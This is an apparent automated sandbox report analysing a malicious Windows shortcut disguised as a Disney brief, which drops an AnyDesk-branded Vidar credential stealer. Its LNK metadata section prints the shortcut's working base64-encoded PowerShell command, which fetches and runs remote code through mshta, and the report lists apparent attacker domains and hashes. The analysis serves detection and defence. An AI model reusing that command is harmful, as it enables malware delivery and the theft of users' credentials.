File name:

Disney_Full_Brief.lnk

Full analysis: https://app.any.run/tasks/b85933ee-1142-4726-9155-8c5823561fd4
Verdict: Malicious activity
Threats:

Stealers are a group of malicious software that are intended for gaining unauthorized access to users’ information and transferring it to the attacker. The stealer malware category includes various types of programs that focus on their particular kind of data, including files, passwords, and cryptocurrency. Stealers are capable of spying on their targets by recording their keystrokes and taking screenshots. This type of malware is primarily distributed as part of phishing campaigns.

Malware Trends Tracker     >>>
Analysis date: July 12, 2025, 07:36:32
OS: Windows 10 Professional (build: 19044, 64 bit)
Tags:
susp-lnk
susp-powershell
anydesk
rmm-tool
telegram
stealer
vidar
Indicators:
MIME: application/x-ms-shortcut
File info: MS Windows shortcut, Item id list present, Has Relative path, Has command line arguments, Icon number=11, Unicoded, HasExpIcon "%ProgramFiles%\Microsoft\Edge\Application\msedge.exe", length=0, window=showminnoactive, IDListSize 0x020d, Root folder "20D04FE0-3AEA-1069-A2D8-08002B30309D", Volume "C:\"
MD5:

2C45FB0C0262993D2669E91686DEF4D1

SHA1:

7647B3D4D82C5F41B17A26477A7BD18418C2112D

SHA256:

4D6BA4C3E0112FA8AD04153999086EECBE9BA33656A52C627A940650D086E877

SSDEEP:

48:8wTX1e3ztOTJzoDsZIGuiJ27zcdo9aQCaZ:8wJPTJwsZIdVJCA

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Executes powershell commands (LNK)

      • powershell.exe (PID: 2708)

    • Executing a file with an untrusted certificate

      • DarkCyan-fa1d3_Install.exe (PID: 1300)

    • VIDAR has been detected (YARA)

      • DarkCyan-fa1d3_Install.exe (PID: 1300)

    • Steals credentials from Web Browsers

      • DarkCyan-fa1d3_Install.exe (PID: 1300)

    • Actions looks like stealing of personal data

      • DarkCyan-fa1d3_Install.exe (PID: 1300)

  • SUSPICIOUS

    • Base64-obfuscated command line is found

      • powershell.exe (PID: 2708)
      • DarkCyan-fa1d3_Install.exe (PID: 1300)

    • Starts POWERSHELL.EXE for commands execution

      • powershell.exe (PID: 2708)
      • powershell.exe (PID: 4748)
      • DarkCyan-fa1d3_Install.exe (PID: 1300)

    • BASE64 encoded PowerShell command has been detected

      • powershell.exe (PID: 2708)
      • DarkCyan-fa1d3_Install.exe (PID: 1300)

    • Application launched itself

      • powershell.exe (PID: 4748)
      • powershell.exe (PID: 2708)

    • Uses WMI to retrieve WMI-managed resources (SCRIPT)

      • mshta.exe (PID: 2680)

    • Executed via WMI

      • powershell.exe (PID: 3624)

    • Creates an object to access WMI (SCRIPT)

      • mshta.exe (PID: 2680)

    • Executes script without checking the security policy

      • powershell.exe (PID: 3624)

    • Converts a specified value to an integer (POWERSHELL)

      • powershell.exe (PID: 3624)

    • ANYDESK has been found

      • powershell.exe (PID: 3624)

    • Executable content was dropped or overwritten

      • powershell.exe (PID: 3624)
      • csc.exe (PID: 856)
      • csc.exe (PID: 7372)
      • csc.exe (PID: 856)
      • csc.exe (PID: 8136)
      • csc.exe (PID: 4132)

    • There is functionality for taking screenshot (YARA)

      • DarkCyan-fa1d3_Install.exe (PID: 1300)

    • Reads security settings of Internet Explorer

      • DarkCyan-fa1d3_Install.exe (PID: 1300)

    • Process communicates with Telegram (possibly using it as an attacker's C2 server)

      • DarkCyan-fa1d3_Install.exe (PID: 1300)

    • The process hide an interactive prompt from the user

      • DarkCyan-fa1d3_Install.exe (PID: 1300)

    • CSC.EXE is used to compile C# code

      • csc.exe (PID: 856)
      • csc.exe (PID: 7372)
      • csc.exe (PID: 856)
      • csc.exe (PID: 4132)
      • csc.exe (PID: 8136)

    • The process bypasses the loading of PowerShell profile settings

      • DarkCyan-fa1d3_Install.exe (PID: 1300)

    • Uses base64 encoding (POWERSHELL)

      • powershell.exe (PID: 2272)
      • powershell.exe (PID: 7828)
      • powershell.exe (PID: 7452)
      • powershell.exe (PID: 7596)
      • powershell.exe (PID: 2220)

    • Searches for installed software

      • DarkCyan-fa1d3_Install.exe (PID: 1300)

  • INFO

    • Checks proxy server information

      • mshta.exe (PID: 2680)
      • powershell.exe (PID: 3624)
      • DarkCyan-fa1d3_Install.exe (PID: 1300)
      • slui.exe (PID: 3480)

    • Uses string replace method (POWERSHELL)

      • powershell.exe (PID: 4748)
      • powershell.exe (PID: 3624)

    • Reads Internet Explorer settings

      • mshta.exe (PID: 2680)

    • Found Base64 encoded access to Regex class via PowerShell (YARA)

      • powershell.exe (PID: 3624)

    • Checks supported languages

      • DarkCyan-fa1d3_Install.exe (PID: 1300)
      • csc.exe (PID: 856)
      • cvtres.exe (PID: 1028)
      • csc.exe (PID: 7372)
      • cvtres.exe (PID: 6200)
      • csc.exe (PID: 856)
      • cvtres.exe (PID: 7436)
      • csc.exe (PID: 4132)
      • cvtres.exe (PID: 7344)
      • csc.exe (PID: 8136)
      • cvtres.exe (PID: 5876)

    • Reads security settings of Internet Explorer

      • OpenWith.exe (PID: 2664)
      • powershell.exe (PID: 2272)
      • powershell.exe (PID: 7828)
      • powershell.exe (PID: 7452)
      • powershell.exe (PID: 7596)
      • powershell.exe (PID: 2220)
      • powershell.exe (PID: 3160)

    • Application launched itself

      • AcroCEF.exe (PID: 6380)
      • Acrobat.exe (PID: 6256)
      • chrome.exe (PID: 4120)
      • chrome.exe (PID: 7784)
      • chrome.exe (PID: 7400)
      • chrome.exe (PID: 8144)
      • chrome.exe (PID: 7928)
      • chrome.exe (PID: 7468)

    • The sample compiled with english language support

      • powershell.exe (PID: 3624)

    • Creates files in the program directory

      • DarkCyan-fa1d3_Install.exe (PID: 1300)

    • Reads the machine GUID from the registry

      • DarkCyan-fa1d3_Install.exe (PID: 1300)
      • csc.exe (PID: 856)
      • csc.exe (PID: 7372)
      • csc.exe (PID: 856)
      • csc.exe (PID: 4132)
      • csc.exe (PID: 8136)

    • Creates files or folders in the user directory

      • DarkCyan-fa1d3_Install.exe (PID: 1300)

    • Reads the software policy settings

      • DarkCyan-fa1d3_Install.exe (PID: 1300)
      • powershell.exe (PID: 2272)
      • powershell.exe (PID: 7828)
      • powershell.exe (PID: 7452)
      • powershell.exe (PID: 7596)
      • powershell.exe (PID: 2220)
      • powershell.exe (PID: 3160)
      • slui.exe (PID: 3480)

    • Reads the computer name

      • DarkCyan-fa1d3_Install.exe (PID: 1300)

    • Reads Microsoft Office registry keys

      • OpenWith.exe (PID: 2664)

    • Reads Environment values

      • DarkCyan-fa1d3_Install.exe (PID: 1300)

    • Reads CPU info

      • DarkCyan-fa1d3_Install.exe (PID: 1300)

    • Disables trace logs

      • powershell.exe (PID: 3624)

    • Checks current location (POWERSHELL)

      • powershell.exe (PID: 6860)

    • Create files in a temporary directory

      • DarkCyan-fa1d3_Install.exe (PID: 1300)
      • powershell.exe (PID: 2272)
      • powershell.exe (PID: 7828)
      • cvtres.exe (PID: 1028)
      • csc.exe (PID: 856)
      • csc.exe (PID: 7372)
      • cvtres.exe (PID: 6200)
      • powershell.exe (PID: 7452)
      • csc.exe (PID: 856)
      • cvtres.exe (PID: 7436)
      • powershell.exe (PID: 7596)
      • csc.exe (PID: 4132)
      • cvtres.exe (PID: 7344)
      • csc.exe (PID: 8136)
      • powershell.exe (PID: 3160)
      • powershell.exe (PID: 2220)
      • cvtres.exe (PID: 5876)

    • Reads product name

      • DarkCyan-fa1d3_Install.exe (PID: 1300)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.lnk | Windows Shortcut (100)

EXIF

LNK

Flags: IDList, RelativePath, CommandArgs, IconFile, Unicode, ExpIcon
FileAttributes: (none)
TargetFileSize: -
IconIndex: 11
RunWindow: Show Minimized No Activate
HotKey: (none)
TargetFileDOSName: powershell.exe
RelativePath: ..\..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
CommandLineArguments: powershell -E cwBjAGIAIAAnAG0AKAAoAHMAKAAoAGgAKAB0AGEAKAAoACAAaAB0AHQAKAAoAHAAKAAoACgAKABzADoALwAvACgAKAB3ACgAKAAoAHcAKAAoACgAdwAuACgAKAAoAGwAbwBjAGEAbABtAGEAKAAoAGkAcwAuACgAKAAoACgAYwBvACgAKABtACgALgAoACgAYgAoACgAcgAvACgARAAoACgAaQAoACgAKAAoAHMAbgBlAHkAXwBGAHUAKAAoACgAbABsAF8AKAAoAEIAcgBpACgAKAAoAGUAZgAoACgAKAAuACgAKAAoAG0AKABwADQAKAAoACgAKAAoACgAJwAuAHIAZQBwAGwAYQBjAGUAKAAnACgAJwAsACcAJwApADsAZwBjAGIAIAB8ACAAcABvAHcAZQByAHMAaABlAGwAbAA=
IconFileName: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
243
Monitored processes
105
Malicious processes
2
Suspicious processes
8

Behavior graph

Click at the process to see the details
start powershell.exe no specs conhost.exe no specs powershell.exe no specs powershell.exe no specs mshta.exe powershell.exe conhost.exe no specs openwith.exe no specs #VIDAR darkcyan-fa1d3_install.exe acrobat.exe acrobat.exe no specs acrocef.exe no specs acrocef.exe no specs acrocef.exe no specs acrocef.exe acrocef.exe no specs acrocef.exe no specs acrocef.exe no specs acrocef.exe no specs acrocef.exe no specs chrome.exe acrocef.exe no specs powershell.exe no specs conhost.exe no specs chrome.exe no specs csc.exe cvtres.exe no specs slui.exe chrome.exe no specs chrome.exe chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe powershell.exe no specs conhost.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs csc.exe cvtres.exe no specs chrome.exe no specs chrome.exe powershell.exe no specs conhost.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs csc.exe cvtres.exe no specs chrome.exe no specs chrome.exe powershell.exe no specs conhost.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs csc.exe cvtres.exe no specs chrome.exe no specs chrome.exe powershell.exe no specs conhost.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs csc.exe cvtres.exe no specs chrome.exe no specs chrome.exe powershell.exe no specs conhost.exe no specs chrome.exe no specs chrome.exe chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs svchost.exe

Process information

PID
CMD
Path
Indicators
Parent process
856"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\admin\AppData\Local\Temp\mkjssl2n.cmdline"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Visual C# Command Line Compiler
Exit code:
0
Version:
4.8.9037.0 built by: NET481REL1
Modules
Images
c:\windows\microsoft.net\framework64\v4.0.30319\csc.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\ole32.dll
856"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\admin\AppData\Local\Temp\per3xzpx.cmdline"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Visual C# Command Line Compiler
Exit code:
0
Version:
4.8.9037.0 built by: NET481REL1
Modules
Images
c:\windows\microsoft.net\framework64\v4.0.30319\csc.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\ole32.dll
1028C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\admin\AppData\Local\Temp\RES1642.tmp" "c:\Users\admin\AppData\Local\Temp\CSCD1AB09BCAE9442639997973DE696128F.TMP"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.execsc.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft® Resource File To COFF Object Conversion Utility
Exit code:
0
Version:
14.32.31326.0
Modules
Images
c:\windows\microsoft.net\framework64\v4.0.30319\cvtres.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\vcruntime140_1_clr0400.dll
1296"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --extension-process --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=1820,i,3157915898331620336,9337952579319487536,262144 --variations-seed-version=20250221-144540.991000 --mojo-platform-channel-handle=3884 /prefetch:2C:\Program Files\Google\Chrome\Application\chrome.exechrome.exe
User:
admin
Company:
Google LLC
Integrity Level:
LOW
Description:
Google Chrome
Exit code:
0
Version:
133.0.6943.127
Modules
Images
c:\program files\google\chrome\application\chrome.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files\google\chrome\application\133.0.6943.127\chrome_elf.dll
c:\windows\system32\version.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\bcryptprimitives.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
1300"C:\Users\admin\AppData\Roaming\DarkCyan-fa1d3_Install.exe" C:\Users\admin\AppData\Roaming\DarkCyan-fa1d3_Install.exe
powershell.exe
User:
admin
Company:
AnyDesk Software GmbH
Integrity Level:
MEDIUM
Description:
AnyDesk
Version:
9.5.7
Modules
Images
c:\users\admin\appdata\roaming\darkcyan-fa1d3_install.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\msvcrt.dll
c:\windows\syswow64\advapi32.dll
1388\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
1936"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=gpu-process --log-severity=disable --user-agent-product="ReaderServices/23.1.20093 Chrome/105.0.0.0" --lang=en-US --gpu-preferences=UAAAAAAAAADgACAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=1524 --field-trial-handle=1620,i,8729716041870340005,7771732445424601459,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:2C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeAcroCEF.exe
User:
admin
Company:
Adobe Systems Incorporated
Integrity Level:
LOW
Description:
Adobe AcroCEF
Exit code:
0
Version:
23.1.20093.0
Modules
Images
c:\program files\adobe\acrobat dc\acrobat\acrocef_1\acrocef.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\win32u.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\gdi32full.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
2032"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=4612,i,2829932549536830831,9167062889677403213,262144 --variations-seed-version=20250221-144540.991000 --mojo-platform-channel-handle=4600 /prefetch:1C:\Program Files\Google\Chrome\Application\chrome.exechrome.exe
User:
admin
Company:
Google LLC
Integrity Level:
LOW
Description:
Google Chrome
Exit code:
0
Version:
133.0.6943.127
Modules
Images
c:\program files\google\chrome\application\chrome.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files\google\chrome\application\133.0.6943.127\chrome_elf.dll
c:\windows\system32\version.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\bcryptprimitives.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
2040"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --disable-quic --string-annotations --field-trial-handle=2132,i,6030629021490684742,7880899286757095648,262144 --variations-seed-version=20250221-144540.991000 --mojo-platform-channel-handle=2164 /prefetch:3C:\Program Files\Google\Chrome\Application\chrome.exe
chrome.exe
User:
admin
Company:
Google LLC
Integrity Level:
MEDIUM
Description:
Google Chrome
Exit code:
0
Version:
133.0.6943.127
Modules
Images
c:\program files\google\chrome\application\chrome.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\aclayers.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\user32.dll
c:\windows\system32\win32u.dll
c:\windows\system32\gdi32.dll
2040"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3208,i,12324914474511994789,6000475780446616241,262144 --variations-seed-version --mojo-platform-channel-handle=3240 /prefetch:1C:\Program Files\Google\Chrome\Application\chrome.exechrome.exe
User:
admin
Company:
Google LLC
Integrity Level:
LOW
Description:
Google Chrome
Exit code:
0
Version:
133.0.6943.127
Modules
Images
c:\program files\google\chrome\application\chrome.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files\google\chrome\application\133.0.6943.127\chrome_elf.dll
c:\windows\system32\version.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\bcryptprimitives.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
Total events
90 746
Read events
90 602
Write events
142
Delete events
2

Modification events

(PID) Process:(2680) mshta.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content
Operation:writeName:CachePrefix
Value:
(PID) Process:(2680) mshta.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies
Operation:writeName:CachePrefix
Value:
Cookie:
(PID) Process:(2680) mshta.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History
Operation:writeName:CachePrefix
Value:
Visited:
(PID) Process:(3624) powershell.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.pdf\OpenWithProgids
Operation:writeName:Acrobat.Document.DC
Value:
(PID) Process:(2664) OpenWith.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.pdf\OpenWithProgids
Operation:writeName:Acrobat.Document.DC
Value:
(PID) Process:(6256) Acrobat.exeKey:HKEY_CLASSES_ROOT\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Mappings\S-1-15-2-2034283098-2252572593-1072577386-2659511007-3245387615-27016815-3920691934
Operation:writeName:DisplayName
Value:
Adobe Acrobat Reader Protected Mode
(PID) Process:(2804) Acrobat.exeKey:HKEY_CURRENT_USER\SOFTWARE\Adobe\Adobe Acrobat\DC\ExitSection
Operation:writeName:bLastExitNormal
Value:
0
(PID) Process:(2804) Acrobat.exeKey:HKEY_CURRENT_USER\SOFTWARE\Adobe\Adobe Acrobat\DC\AVEntitlement
Operation:writeName:bSynchronizeOPL
Value:
0
(PID) Process:(2804) Acrobat.exeKey:HKEY_CURRENT_USER\SOFTWARE\Adobe\Adobe Acrobat\DC\AVGeneral
Operation:writeName:uLastAppLaunchTimeStamp
Value:
(PID) Process:(2804) Acrobat.exeKey:HKEY_CURRENT_USER\SOFTWARE\Adobe\Adobe Acrobat\DC\AVGeneral
Operation:writeName:iNumAcrobatLaunches
Value:
7
Executable files
6
Suspicious files
275
Text files
207
Unknown types
0

Dropped files

PID
Process
Filename
Type
3624powershell.exeC:\Users\admin\AppData\Roaming\Brief_Disney.pdf
MD5:
SHA256:
2708powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\VE1O5DBKGA0WNB35729B.tempbinary
MD5:C6EBC891866DB8AB4A705E194086BFFC
SHA256:E8D1653EC8C0A5416D38C54A04F0541841D40D2B23964922EC2BFE868DDF66A1
4748powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_rz3fdumw.pmr.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
2708powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_h0muxj1y.nhu.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
4748powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_ka3cqsin.hgh.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
6860powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_jxq0xrox.y0t.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
6860powershell.exeC:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactivebinary
MD5:0E111B039165A9C2620122322DBDD5F6
SHA256:1DD25D870AF149620332B3A39AFC0BEB7AA432C249B275DA00CE9977E8A67747
6860powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_pxhzgjxc.mep.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
3624powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_2oeu0qop.b51.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
3624powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_ddta4vzv.evd.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
15
TCP/UDP connections
131
DNS requests
131
Threats
1

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
1268
svchost.exe
GET
200
23.216.77.25:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
unknown
whitelisted
1300
DarkCyan-fa1d3_Install.exe
GET
200
104.18.21.213:80
http://e6.c.lencr.org/89.crl
unknown
whitelisted
7020
svchost.exe
GET
200
2.17.190.73:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D
unknown
whitelisted
3048
SIHClient.exe
GET
200
23.35.229.160:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Update%20Secure%20Server%20CA%202.1.crl
unknown
whitelisted
3048
SIHClient.exe
GET
200
23.35.229.160:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Product%20Root%20Certificate%20Authority%202018.crl
unknown
whitelisted
7572
chrome.exe
GET
200
142.250.184.238:80
http://clients2.google.com/time/1/current?cup2key=8:fmZOi_5-9cQH8i3Ye5r5kVFO9VX91kvqQ8ss-pe_nts&cup2hreq=e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
unknown
whitelisted
6256
Acrobat.exe
GET
200
184.30.131.245:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAfy81yHqHeveu%2FpR5k1Jb0%3D
unknown
whitelisted
1268
svchost.exe
GET
200
23.35.229.160:80
http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
unknown
whitelisted
2940
svchost.exe
GET
200
104.76.201.34:80
http://x1.c.lencr.org/
unknown
whitelisted
7612
chrome.exe
GET
200
142.250.184.238:80
http://clients2.google.com/time/1/current?cup2key=8:39w0KfSguIW3YdjfPioOyO6wkdCHPjSRXcNbBNT7zCM&cup2hreq=e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
unknown
whitelisted
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
1268
svchost.exe
40.127.240.158:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
4
System
192.168.100.255:137
whitelisted
5944
MoUsoCoreWorker.exe
40.127.240.158:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
3936
RUXIMICS.exe
40.127.240.158:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
4
System
192.168.100.255:138
whitelisted
2680
mshta.exe
191.252.139.125:443
www.localmais.com.br
Locaweb Servicos de Internet SA
BR
unknown
1268
svchost.exe
51.124.78.146:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
1268
svchost.exe
23.216.77.25:80
crl.microsoft.com
Akamai International B.V.
DE
whitelisted
1268
svchost.exe
23.35.229.160:80
www.microsoft.com
AKAMAI-AS
DE
whitelisted
2680
mshta.exe
104.18.21.213:80
r11.c.lencr.org
CLOUDFLARENET
whitelisted

DNS requests

Domain
IP
Reputation
settings-win.data.microsoft.com
  • 40.127.240.158
  • 51.124.78.146
  • 51.104.136.2
whitelisted
google.com
  • 142.250.186.174
whitelisted
www.localmais.com.br
  • 191.252.139.125
unknown
crl.microsoft.com
  • 23.216.77.25
  • 23.216.77.21
whitelisted
www.microsoft.com
  • 23.35.229.160
whitelisted
r11.c.lencr.org
  • 104.18.21.213
  • 104.18.20.213
whitelisted
login.live.com
  • 20.190.159.71
  • 40.126.31.129
  • 40.126.31.1
  • 20.190.159.129
  • 40.126.31.69
  • 20.190.159.75
  • 40.126.31.3
  • 40.126.31.130
whitelisted
ocsp.digicert.com
  • 2.17.190.73
  • 184.30.131.245
whitelisted
squeakiekids.com
  • 69.64.83.216
unknown
nexusrules.officeapps.live.com
  • 52.111.229.48
whitelisted

Threats

PID
Process
Class
Message
1300
DarkCyan-fa1d3_Install.exe
Misc activity
ET INFO Observed Telegram Domain (t .me in TLS SNI)
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2025 ANY.RUN ALL RIGHTS RESERVED
ANY.RUN
Reports
Disney_Full_Brief.lnk